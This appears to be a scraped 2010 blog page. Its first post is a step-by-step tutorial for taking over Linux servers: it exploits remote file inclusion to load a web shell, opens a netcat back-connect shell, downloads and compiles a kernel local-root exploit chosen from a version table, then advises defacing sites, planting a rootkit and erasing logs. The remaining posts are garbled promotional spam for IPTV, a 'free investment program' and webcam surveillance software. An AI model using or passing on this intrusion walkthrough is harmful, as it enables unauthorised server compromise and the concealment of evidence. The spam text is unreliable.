Language

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

Selasa, 03 Agustus 2010

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF
notice:
You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-
Suppose that we have found a site with R.F.I. vulnerability:

http://www.example.com/folder/index.html?page=

we can run shell exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/ind…vilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)
After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname – a in Command line.
To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.
We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder
In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).
Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:
We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.
We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:
e.g.
cd C:\Program Files\Netcat
And we type the following command:
nc -n -l -v -p 11457
NetCat respond: listening on [any] 11457 …
In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)
In the Port form we will put the port that we opened and NetCat listens.
If we press connect the shell will respond:
Now script try connect to port 11457 …
If our settings are correct NetCat will give us a shell to the server
Now we wil continue to the Rooting proccess.
We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don’t have the correct permissions.
List of the exploits/kernel:
Code:
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.
We can find writable folders/files by typing:
find / -perm -2 -ls
We can use the /tmp folder which is a standard writable folder
We type: cd /tmp
To download the local root exploit we can use a download command for linux like
wget.
For example:
wget http://www.Example/localroot/h00lyshit.c
where http://www.Example.com/localroot/h00lyshit.c is the url of h00lyshit.
After the download we must compile the exploit (Read the instruction of the exploit
before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
Now we have created the executable file: h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
We must wait 2-3 minutes for the file creation
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.
good luck :P
Selengkapnya...

Kamis, 15 Juli 2010

Watch TV TV stations live from home

Watch television - Live IP TVGet
4000 Online TV channels from your PC.
Not required of a television tuner or decoder. Pure picture - no monthly payment needed.

Watch TV stations online from home. All you need is
our IP TV software,
your computer, and online connection.

Using live television is very convenient and affordable without all the wires and installation charges
it takes for regular cable or satellite TV services to be connected.
With live TV, all you simply need is a PC and the internet, it's that easy.
Most services are available online for free and almost all large broadcasting stations like Fox,
NBC, and ABC have web-sites where their shows can be viewed. There is no need to buy cable if you hardly ever
watch television when everything is available on Internet, even live broadcasting of last news.

No reason to purchase cable TV for hundreds of dollars if you can install TV
on your computer? Online television is the next new leap in Internet technology.
Simply thing, Online television offers a consumer a way
to watch their favorite programs and movies without clicking a button
on the television remote control.

Look at the abc's of Online TV. With
Internet Protocol Television you are able to watch television on the number of
devices such as, your PC monitor, a Cell Phone, a notebook, or even
with the right device you can upload movies and shows
to home regular television. With last modern software, high speed
or cable Internet connections and well designed electronics,
you can even watch television on your cell phone.

Selengkapnya...

Selasa, 13 Juli 2010

FREE INVESTMENT PROGRAM

affiliate program

GET CASH FROM YOUR SITE

Turn your valuable site traffic into revenue.
Work online and join our free money making partner program.
We offer the most payment rate to help maximize your
income stream.

Join our cash making program absolutely free and 100% risk free.

Sign Up...

Get paid after you not working

Create many new income incomes
each and every month.
Get paid after you stop working or even retire at an early age with a
powerful revenue stream.
Do this one time and get cash over and over again.
This is best time to create
astonishing
new levels of profit
and success on the Internet.

Establish a constant stream of income

Our money making program
helps you to establish a steady stream
of income, all around the clock.
Giving you more time to focus on the things you love.

You'll even be making money while you not working!

FREE INVESTMENT PROGRAM

We designed this earning money program
specially for NO SETUP FEE methods,
to make thousands, if not millions of dollars, without spending dollars.

Electronic Billboards and Electronic Signs | tv7000_/title Info on electronic billboards and electronic signs, for both indoor and outdoor applications.

Selengkapnya...

Camera

I'm using webcamera software. I
can webcast Ip video to view my site
from anyplace.


Web camera software identifies movement, sounds alarm, captures images, records video, and sends captured images by e-mail

With my new

webcam software
, I can run a streaming broadcast
of my site visible from the Internet. This opens up a league
of opportunities, the surface of which has not even been scratched in today's world. I can use
this broadcast for surveillance purposes, allowing me to watch what's going on in my home
at any time from a remote viewing station.

As long as I have the web camera
running and a remote workstation with Online access, I can view the home.
With the software and the webcam, I can change the settings to capture picture,
detect activity (if I don't want to keep the webcam running at all times),
or use a combination of a live feed and recorded video to realize a security
system that takes full benefit of novel technology.

With a capture card,
I can easily move appropriate video and screenshots to use on
any station.

With delicate files on my workstation
and useful things in my apartment,
it only makes sense to have a protection setup that I can monitor whenever I feel that my privacy
is being compromised. If I owned a small business or lived with roommates, I couldn't imagine
living without it.

Webcam software detects motion, sounds
alarm, captures images, records video, and sends captured images by e-mail


Webcam software senses movement, sounds siren, captures snapshots, records video, and sends captured images by email
Webcams
are perfect for more than just making ip conversations
more sensible. They can in addition be
an tremendously effective instrument
for use in home or firm protection.

Software

is now available that can sense motion and use
it as a trigger for numerous events.


The way that
it works is to analyze the image sent by a webcam that is either connected using USB
or through a video capture card for movement. Once it picks up
that motion, it can after that acquire any number of procedures,
including triggering an siren.

A more popular application, though, is to either
send live images of what is happening in the scene that is covered by the camera
or to even webcast using live broadcasting precisely what is
happening with both sound and picture. If installed covertly,
this software could even be used for clandestine surveillance.

Given the
large quantity of systems that either have a web camera attached
or can support one, this is an excellent way to inexpensively and effortlessly guard
the spot across that property
from intrusion or burglary.

New professional protection software works with
any web camera, Internet cameras, and major capture cards.


Webcam software detects activity, triggers siren, captures images, records video, and sends captured images by e-mail


Security application

has become so complicated that the regular
businessman who has been busy minding his store instead of pouring over electronics and online
know-how articles can be easily overwhelmed when it comes time to install or renew his surveillance system.


Fortunately, there is modern professional security software that simplifies much of the decision making.
You don't necessarily have to get rid of a working analog closed circuit TV system in order to modernize to a broadcasting
video that can be watched from any internet connected station or 3G phone. Video capture cards can digitally convert the
snapshots for webcast. Until yesterday, there had been no real attempts to regulate the new Internet
cameras; every make and manufacturer functioned a little differently. And when you throw web cameras into the
join, finding one application to control them all was heavy.



Professional security application

is now available that will work for any web camera
or IP webcam and for most capture cards as well. You can monitor whatever your motion
sensors are picking up at your residence or company while you can be half a globe away.
The application itself may not be easy, but it can make life simpler for you.

Selengkapnya...